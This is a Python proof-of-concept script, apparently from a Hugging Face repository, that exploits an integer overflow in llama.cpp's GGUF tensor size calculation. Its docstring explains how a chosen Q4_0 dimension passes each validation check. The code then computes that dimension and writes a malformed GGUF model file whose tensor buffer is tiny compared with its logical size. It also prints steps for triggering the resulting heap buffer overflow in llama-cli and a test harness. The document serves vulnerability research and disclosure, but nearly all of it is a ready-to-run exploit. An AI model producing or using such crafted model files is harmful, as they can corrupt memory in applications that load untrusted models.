llama-cpp-tensor-overflow-poc / poc_tensor_overflow.py

Upload poc_tensor_overflow.py with huggingface_hub

d6a1163 verified about 1 month ago

19.2 kB

	#!/usr/bin/env python3
	"""
	PoC: Heap Buffer Overflow via Integer Overflow in Tensor Size Calculation
	Target: llama.cpp GGUF loading (ggml/src/ggml.c and ggml/src/gguf.cpp)

	=== Vulnerability Summary ===

	In ggml_row_size() (ggml.c:1275):
	size_t ggml_row_size(enum ggml_type type, int64_t ne) {
	return ggml_type_size(type)*ne/ggml_blck_size(type);
	}

	The multiplication `ggml_type_size(type) * ne` is performed in size_t (uint64_t)
	arithmetic. When type_size * ne > 2^64, this silently wraps around, producing a
	much smaller result than expected. The subsequent division by blck_size then yields
	a tiny value.

	This propagates to:
	- ggml_new_tensor_impl() (ggml.c:1686) where data_size is computed
	- ggml_nbytes() (ggml.c:1238) where the tensor byte size is computed
	- Buffer allocation and data loading code

	The overflow check in gguf.cpp (lines 550-552) verifies that the ELEMENT COUNT
	(ne[0]ne[1]ne[2]*ne[3]) fits in int64_t, but does NOT check that the BYTE SIZE
	(element_count * type_size / blck_size) fits in size_t. For quantized types where
	type_size > blck_size, the byte size can overflow even when the element count doesn't.

	The check at gguf.cpp line 589:
	uint64_t(ggml_nelements(&info.t)/ggml_blck_size(info.t.type)) > SIZE_MAX/ggml_type_size(info.t.type)

	uses ggml_nelements() which itself computes ne[0]ne[1]ne[2]*ne[3] in int64_t.
	For our chosen values, this product fits in int64_t, so ggml_nelements returns the
	correct value. BUT the subsequent division and comparison uses integer arithmetic
	that can be imprecise for values near SIZE_MAX.

	=== Exploit Strategy ===

	For GGML_TYPE_Q4_0:
	- type_size = 18 bytes (sizeof(block_q4_0) = sizeof(ggml_half) + 32/2 = 2 + 16)
	- blck_size = 32

	We choose ne[0] such that 18 * ne[0] wraps around 2^64 to a tiny value.

	ne[0] = 1024819115206086208 (divisible by 32)

	Mathematical: 18 * ne[0] = 18446744073709551744 = 2^64 + 128
	In uint64: 18 * ne[0] mod 2^64 = 128
	After /32: 128 / 32 = 4 bytes (ggml_row_size returns 4!)

	Correct: 18 * ne[0] / 32 = 576460752303423492 bytes (~512 PB)
	Computed: 4 bytes

	Ratio: buffer is 144,115,188,075,855,873x too small!

	Validation bypass:
	- ne[0] = 1024819115206086208 < INT64_MAX (9223372036854775807) -> passes
	- ne[0] > 0 -> passes non-negative check
	- ne[0] % 32 == 0 -> passes block alignment check
	- ggml_nelements = ne[0] = 1024819115206086208
	- nelements/32 = 32025597350190194
	- SIZE_MAX/18 = 1024819115206086200
	- 32025597350190194 < 1024819115206086200 -> passes byte size check (line 589)!

	Result: A tensor is created with ne[0] = 1024819115206086208 elements but backed
	by only 4-32 bytes of actual buffer. Any operation that accesses data beyond the
	first few bytes triggers a heap buffer overflow.

	=== GGUF Binary Format Reference ===

	Header:
	- Magic: "GGUF" (4 bytes)
	- Version: uint32 (3)
	- n_tensors: uint64
	- n_kv: uint64

	KV pairs:
	- key: string (uint64 len + chars)
	- type: uint32 (GGUF type enum)
	- value: type-dependent

	Tensor info (per tensor):
	- name: string (uint64 len + chars)
	- n_dims: uint32
	- ne[0..n_dims-1]: int64 each
	- type: uint32 (ggml_type enum)
	- offset: uint64

	Data section: aligned to ctx->alignment (default 32)
	"""

	import struct
	import sys
	import os
	import math

	# ============================================================
	# GGUF constants
	# ============================================================
	GGUF_MAGIC = b"GGUF"
	GGUF_VERSION = 3

	# GGUF value types
	GGUF_TYPE_UINT8 = 0
	GGUF_TYPE_INT8 = 1
	GGUF_TYPE_UINT16 = 2
	GGUF_TYPE_INT16 = 3
	GGUF_TYPE_UINT32 = 4
	GGUF_TYPE_INT32 = 5
	GGUF_TYPE_FLOAT32 = 6
	GGUF_TYPE_BOOL = 7
	GGUF_TYPE_STRING = 8
	GGUF_TYPE_ARRAY = 9
	GGUF_TYPE_UINT64 = 10
	GGUF_TYPE_INT64 = 11
	GGUF_TYPE_FLOAT64 = 12

	# ggml_type enum values
	GGML_TYPE_F32 = 0
	GGML_TYPE_F16 = 1
	GGML_TYPE_Q4_0 = 2
	GGML_TYPE_Q4_1 = 3
	GGML_TYPE_Q5_0 = 6
	GGML_TYPE_Q5_1 = 7
	GGML_TYPE_Q8_0 = 8
	GGML_TYPE_I8 = 24
	GGML_TYPE_I32 = 26

	# Q4_0 type properties
	Q4_0_TYPE_SIZE = 18 # sizeof(block_q4_0) = sizeof(ggml_half) + QK4_0/2 = 2 + 16
	Q4_0_BLCK_SIZE = 32 # QK4_0

	INT64_MAX = (1 << 63) - 1
	UINT64_MAX = (1 << 64) - 1
	SIZE_MAX = UINT64_MAX # 64-bit platform

	GGML_DEFAULT_ALIGNMENT = 32

	# ============================================================
	# Helper functions
	# ============================================================

	def write_string(f, s):
	"""Write a GGUF string: uint64 length + chars (no null terminator)"""
	encoded = s.encode('utf-8')
	f.write(struct.pack('<Q', len(encoded)))
	f.write(encoded)

	def write_kv_string(f, key, value):
	"""Write a KV pair with string value"""
	write_string(f, key)
	f.write(struct.pack('<I', GGUF_TYPE_STRING))
	write_string(f, value)

	def write_kv_uint32(f, key, value):
	"""Write a KV pair with uint32 value"""
	write_string(f, key)
	f.write(struct.pack('<I', GGUF_TYPE_UINT32))
	f.write(struct.pack('<I', value))

	def write_kv_float32(f, key, value):
	"""Write a KV pair with float32 value"""
	write_string(f, key)
	f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
	f.write(struct.pack('<f', value))

	def write_kv_string_array(f, key, values):
	"""Write a KV pair with string array value"""
	write_string(f, key)
	f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
	f.write(struct.pack('<I', GGUF_TYPE_STRING))
	f.write(struct.pack('<Q', len(values)))
	for v in values:
	write_string(f, v)

	def write_kv_float32_array(f, key, values):
	"""Write a KV pair with float32 array value"""
	write_string(f, key)
	f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
	f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
	f.write(struct.pack('<Q', len(values)))
	for v in values:
	f.write(struct.pack('<f', v))

	def write_tensor_info(f, name, n_dims, ne_list, ggml_type, offset):
	"""Write a single tensor info entry"""
	write_string(f, name)
	f.write(struct.pack('<I', n_dims))
	for i in range(n_dims):
	f.write(struct.pack('<q', ne_list[i])) # int64_t (signed)
	f.write(struct.pack('<I', ggml_type))
	f.write(struct.pack('<Q', offset))


	# ============================================================
	# Overflow calculation and verification
	# ============================================================

	def compute_overflow_ne0():
	"""
	Find ne[0] for Q4_0 type such that:
	- ne[0] is positive and fits in int64_t (< 2^63)
	- ne[0] is divisible by blck_size (32)
	- 18 * ne[0] overflows uint64_t to a very small value
	- All GGUF validation checks pass

	We solve: 18 * ne[0] = k * 2^64 + remainder
	For k=1: ne[0] = (2^64 + remainder) / 18
	We want remainder to be small and divisible by 32 (so that
	ggml_row_size = remainder/32 is small).

	18 * ne[0] = 2^64 + 128 (remainder=128, 128/32=4)
	ne[0] = (2^64 + 128) / 18 = 1024819115206086208
	"""
	type_size = Q4_0_TYPE_SIZE # 18
	blck_size = Q4_0_BLCK_SIZE # 32

	# We want: type_size * ne0 = 2^64 + target_remainder
	# Choose target_remainder = 128 (divisible by 32, gives row_size of 4)
	target_remainder = 128
	target_product = (1 << 64) + target_remainder

	if target_product % type_size != 0:
	raise ValueError(f"Cannot find exact ne[0]: {target_product} not divisible by {type_size}")

	ne0 = target_product // type_size
	assert ne0 * type_size == target_product, "Arithmetic check failed"

	# Verify ne0 is divisible by blck_size
	assert ne0 % blck_size == 0, f"ne[0]={ne0} not divisible by blck_size={blck_size}"

	# Verify ne0 fits in int64_t
	assert 0 < ne0 < (1 << 63), f"ne[0]={ne0} does not fit in int64_t"

	return ne0


	def verify_overflow(ne0, ne1=1, ne2=1, ne3=1):
	"""Verify that the chosen dimensions bypass all checks and cause overflow"""
	type_size = Q4_0_TYPE_SIZE
	blck_size = Q4_0_BLCK_SIZE

	print(f"\n{'='*70}")
	print("OVERFLOW ANALYSIS")
	print(f"{'='*70}")
	print(f"Type: Q4_0 (type_size={type_size}, blck_size={blck_size})")
	print(f"Dimensions: ne[0]={ne0}, ne[1]={ne1}, ne[2]={ne2}, ne[3]={ne3}")
	print()

	# Check 1: gguf.cpp line 540-546 - non-negative check
	assert ne0 >= 0 and ne1 >= 0 and ne2 >= 0 and ne3 >= 0
	print("[PASS] All ne[j] >= 0 (non-negative check)")

	# Check 2: gguf.cpp line 550-552 - overflow check
	# INT64_MAX/ne[1] <= ne[0] -> must be FALSE to pass
	check1 = INT64_MAX // ne1 <= ne0
	print(f" Check 1: INT64_MAX/ne[1] = {INT64_MAX // ne1} <= ne[0] = {ne0} ? {check1}")
	assert not check1, "Failed overflow check 1!"

	# INT64_MAX/ne[2] <= ne[0]*ne[1] -> must be FALSE
	prod01 = ne0 * ne1 # Safe in Python (arbitrary precision)
	assert prod01 < (1 << 63), f"ne[0]*ne[1] = {prod01} overflows int64_t!"
	check2 = INT64_MAX // ne2 <= prod01
	print(f" Check 2: INT64_MAX/ne[2] = {INT64_MAX // ne2} <= ne[0]*ne[1] = {prod01} ? {check2}")
	assert not check2, "Failed overflow check 2!"

	# INT64_MAX/ne[3] <= ne[0]ne[1]ne[2] -> must be FALSE
	prod012 = prod01 * ne2
	assert prod012 < (1 << 63), f"ne[0]ne[1]ne[2] = {prod012} overflows int64_t!"
	check3 = INT64_MAX // ne3 <= prod012
	print(f" Check 3: INT64_MAX/ne[3] = {INT64_MAX // ne3} <= ne[0]ne[1]ne[2] = {prod012} ? {check3}")
	assert not check3, "Failed overflow check 3!"

	print("[PASS] Overflow check at gguf.cpp:550-552 bypassed")

	# Check 3: gguf.cpp line 580 - block alignment
	assert ne0 % blck_size == 0
	print(f"[PASS] ne[0] % blck_size == 0 (block alignment check)")

	# Check 4: gguf.cpp line 589 - byte size representable
	nelements = ne0 * ne1 * ne2 * ne3
	assert nelements < (1 << 63), "ggml_nelements overflows int64_t!"
	lhs = nelements // blck_size # uint64_t(ggml_nelements/blck_size)
	rhs = SIZE_MAX // type_size # SIZE_MAX/type_size
	byte_check = lhs > rhs
	print(f" Byte size check: nelements/blck_size = {lhs} > SIZE_MAX/type_size = {rhs} ? {byte_check}")
	assert not byte_check, "Failed byte size check!"
	print("[PASS] Byte size check at gguf.cpp:589 bypassed")

	# Now compute the ACTUAL overflow
	print(f"\n{'='*70}")
	print("SIZE COMPUTATION (showing the overflow)")
	print(f"{'='*70}")

	# ggml_row_size(Q4_0, ne[0]) = type_size * ne[0] / blck_size
	true_product = type_size * ne0
	wrapped_product = true_product % (1 << 64) # uint64_t wrap
	row_size_overflowed = wrapped_product // blck_size
	row_size_correct = true_product // blck_size

	print(f"\nggml_row_size computation:")
	print(f" type_size * ne[0] = {true_product}")
	print(f" = 2^64 * {true_product // (1 << 64)} + {true_product % (1 << 64)}")
	print(f" In uint64_t (mod 2^64): {wrapped_product}")
	print(f" After / blck_size: {row_size_overflowed} bytes <-- OVERFLOWED!")
	print(f" Correct value: {row_size_correct} bytes")
	print(f" Overflow factor: {row_size_correct / row_size_overflowed:.0f}x too small!")

	# data_size computation
	data_size = row_size_overflowed
	for dim in [ne1, ne2, ne3]:
	if dim > 1:
	data_size = (data_size * dim) % (1 << 64)

	correct_size = row_size_correct * ne1 * ne2 * ne3

	print(f"\ndata_size (ggml_new_tensor_impl):")
	print(f" Computed: {data_size} bytes ({data_size} B)")
	print(f" Correct: {correct_size} bytes ({correct_size / (1024**5):.1f} PB)")

	# ggml_nbytes computation
	# For quantized: nbytes = ne[0]nb[0]/blck_size + sum((ne[i]-1)nb[i])
	nb0 = type_size # = 18
	nb1 = type_size * (ne0 // blck_size) # This doesn't overflow because ne0/32 is reasonable
	nb2 = nb1 * ne1
	nb3 = nb2 * ne2

	# ne[0] * nb[0] overflows!
	ne0_nb0_true = ne0 * nb0
	ne0_nb0_wrapped = ne0_nb0_true % (1 << 64)
	nbytes_first = ne0_nb0_wrapped // blck_size

	nbytes = nbytes_first
	if ne1 > 1:
	nbytes += (ne1 - 1) * nb1
	if ne2 > 1:
	nbytes += (ne2 - 1) * nb2
	if ne3 > 1:
	nbytes += (ne3 - 1) * nb3

	nbytes_correct = correct_size

	print(f"\nggml_nbytes:")
	print(f" ne[0]nb[0] = {ne0} {nb0} = {ne0_nb0_true}")
	print(f" In uint64_t: {ne0_nb0_wrapped}")
	print(f" / blck_size: {nbytes_first}")
	print(f" + stride terms: {nbytes - nbytes_first}")
	print(f" Total nbytes: {nbytes} bytes")
	print(f" Correct value: {nbytes_correct} bytes")

	# What gets allocated vs what the tensor "thinks" it has
	padded = ((nbytes + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT
	print(f"\n{'='*70}")
	print("HEAP BUFFER OVERFLOW")
	print(f"{'='*70}")
	print(f" Buffer allocated: {padded} bytes (GGML_PAD({nbytes}, {GGML_DEFAULT_ALIGNMENT}))")
	print(f" Tensor logical size: {nbytes_correct} bytes")
	print(f" Overflow: {nbytes_correct - padded} bytes beyond allocation")
	print(f" Stride nb[1]: {nb1} bytes (distance between rows)")
	print(f" Any access to row 1+ is {nb1 - padded} bytes out of bounds!")

	return data_size, nbytes, padded


	def create_poc_gguf(output_path):
	"""
	Create a GGUF file with a tensor whose dimensions cause integer overflow
	in ggml_row_size(), resulting in a tiny buffer allocation for what should
	be an enormous tensor.
	"""
	ne0 = compute_overflow_ne0()
	ne1 = 1 # Keep simple - 1D tensor is enough to trigger the overflow
	ne2 = 1
	ne3 = 1

	data_size, nbytes, padded_size = verify_overflow(ne0, ne1, ne2, ne3)

	# ---- Build the GGUF file ----

	# Metadata KV pairs needed for llama.cpp to proceed with loading
	kv_pairs = []
	n_kv = 0

	# Tensors: one tensor with overflow-inducing dimensions
	# Use a name that llama.cpp expects for a llama model
	tensor_name = "token_embd.weight"
	n_tensors = 1

	print(f"\n{'='*70}")
	print("GENERATING GGUF FILE")
	print(f"{'='*70}")
	print(f" Tensor: '{tensor_name}'")
	print(f" Type: Q4_0 (type_size=18, blck_size=32)")
	print(f" Dimensions: ne[0]={ne0}")
	print(f" Tensor data in file: {padded_size} bytes (the overflowed/small size)")
	print(f" Output: {output_path}")

	with open(output_path, 'wb') as f:
	# ---- GGUF Header ----
	f.write(GGUF_MAGIC)
	f.write(struct.pack('<I', GGUF_VERSION))
	f.write(struct.pack('<Q', n_tensors))

	# Minimal token vocabulary (just 4 tokens: UNK, BOS, EOS, and a word)
	vocab_tokens = ["<unk>", "<s>", "</s>", "hello"]
	vocab_scores = [0.0, 0.0, 0.0, -1.0]
	vocab_types = [0, 3, 3, 1] # NORMAL=0, CONTROL=3, NORMAL=1

	# Count KV pairs: 13 scalar + 3 array = 16
	n_kv = 16
	f.write(struct.pack('<Q', n_kv))

	# ---- Write scalar KV pairs ----
	write_kv_string(f, "general.architecture", "llama")
	write_kv_string(f, "general.name", "overflow-poc")
	write_kv_uint32(f, "llama.context_length", 2048)
	write_kv_uint32(f, "llama.embedding_length", 4096)
	write_kv_uint32(f, "llama.block_count", 1)
	write_kv_uint32(f, "llama.feed_forward_length", 11008)
	write_kv_uint32(f, "llama.attention.head_count", 32)
	write_kv_uint32(f, "llama.attention.head_count_kv", 32)
	write_kv_float32(f, "llama.rope.freq_base", 10000.0)
	write_kv_float32(f, "llama.attention.layer_norm_rms_epsilon", 1e-5)
	write_kv_string(f, "tokenizer.ggml.model", "llama")
	write_kv_uint32(f, "tokenizer.ggml.bos_token_id", 1)
	write_kv_uint32(f, "tokenizer.ggml.eos_token_id", 2)

	# ---- Write array KV pairs (tokenizer vocab) ----
	write_kv_string_array(f, "tokenizer.ggml.tokens", vocab_tokens)
	write_kv_float32_array(f, "tokenizer.ggml.scores", vocab_scores)

	# token types: int32 array
	write_string(f, "tokenizer.ggml.token_type")
	f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
	f.write(struct.pack('<I', GGUF_TYPE_INT32))
	f.write(struct.pack('<Q', len(vocab_types)))
	for t in vocab_types:
	f.write(struct.pack('<i', t))

	# ---- Write Tensor Info ----
	# Tensor: 1D Q4_0 tensor with overflow-inducing ne[0]
	write_tensor_info(f, tensor_name, 1, [ne0], GGML_TYPE_Q4_0, 0)

	# ---- Align to data section ----
	current_pos = f.tell()
	aligned_pos = ((current_pos + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT
	padding_needed = aligned_pos - current_pos
	if padding_needed > 0:
	f.write(b'\x00' * padding_needed)

	# ---- Write tensor data ----
	# Write exactly padded_size bytes of tensor data (the overflowed small amount)
	# In practice, filling with a recognizable pattern helps identify OOB reads
	tensor_data = b'\xAA' * padded_size
	f.write(tensor_data)

	file_size = os.path.getsize(output_path)
	print(f" File size: {file_size} bytes")
	print(f"\n[+] GGUF file written successfully")

	return output_path


	def main():
	output_dir = "/Users/eltarne/Documents/script/gguf_poc"
	os.makedirs(output_dir, exist_ok=True)

	output_path = os.path.join(output_dir, "poc_tensor_overflow.gguf")

	print("=" * 70)
	print("PoC: Integer Overflow in Tensor Size Calculation (GGUF)")
	print("Target: llama.cpp ggml_row_size() / ggml_nbytes()")
	print("=" * 70)

	# Step 1: Compute the overflow-inducing dimension
	ne0 = compute_overflow_ne0()
	print(f"\n[+] Found overflow-inducing ne[0] = {ne0}")
	print(f" = 0x{ne0:016X}")
	print(f" Fits in int64_t: {ne0 < (1 << 63)}")
	print(f" Divisible by 32: {ne0 % 32 == 0}")

	# Step 2: Verify all checks are bypassed
	print(f"\n[+] Verifying validation bypass and computing overflow...")

	# Step 3: Create the GGUF file
	create_poc_gguf(output_path)

	# Step 4: Instructions
	print(f"\n{'='*70}")
	print("EXPLOITATION")
	print(f"{'='*70}")
	print(f"""
	When llama.cpp loads this GGUF file:

	1. gguf_init_from_file() reads tensor info:
	- ne[0] = {ne0}
	- type = Q4_0 (type_size=18, blck_size=32)
	- All validation checks PASS (see analysis above)

	2. ggml_nbytes() computes tensor size:
	- ne[0] * nb[0] = {ne0} * 18 = {ne0 * 18}
	- In uint64_t: {(ne0 * 18) % (1 << 64)} (OVERFLOWED!)
	- Result: {((ne0 * 18) % (1 << 64)) // 32} bytes instead of {ne0 * 18 // 32}

	3. Buffer allocation uses the tiny overflowed size
	-> Only {(((ne0 * 18) % (1 << 64)) // 32 + 31) // 32 * 32} bytes allocated

	4. Tensor metadata says ne[0]={ne0} with stride nb[1]={18 * (ne0 // 32)}
	-> Any access beyond first few bytes is a HEAP BUFFER OVERFLOW

	To test with llama-cli (demonstrates GGUF validation bypass):
	cd /Users/eltarne/Documents/script/llama.cpp/build/bin
	./llama-cli -m {output_path} -p 'hello' 2>&1
	# Note: llama-cli rejects at model-level shape check, but GGUF parsing passes

	To test with the C test harness (demonstrates the actual overflow):
	cd /Users/eltarne/Documents/script/gguf_poc
	./test_tensor_overflow poc_tensor_overflow.gguf
	# Shows: ggml_nbytes=4 for tensor with 10^18 elements -> HEAP BUFFER OVERFLOW
	""")


	if __name__ == "__main__":
	main()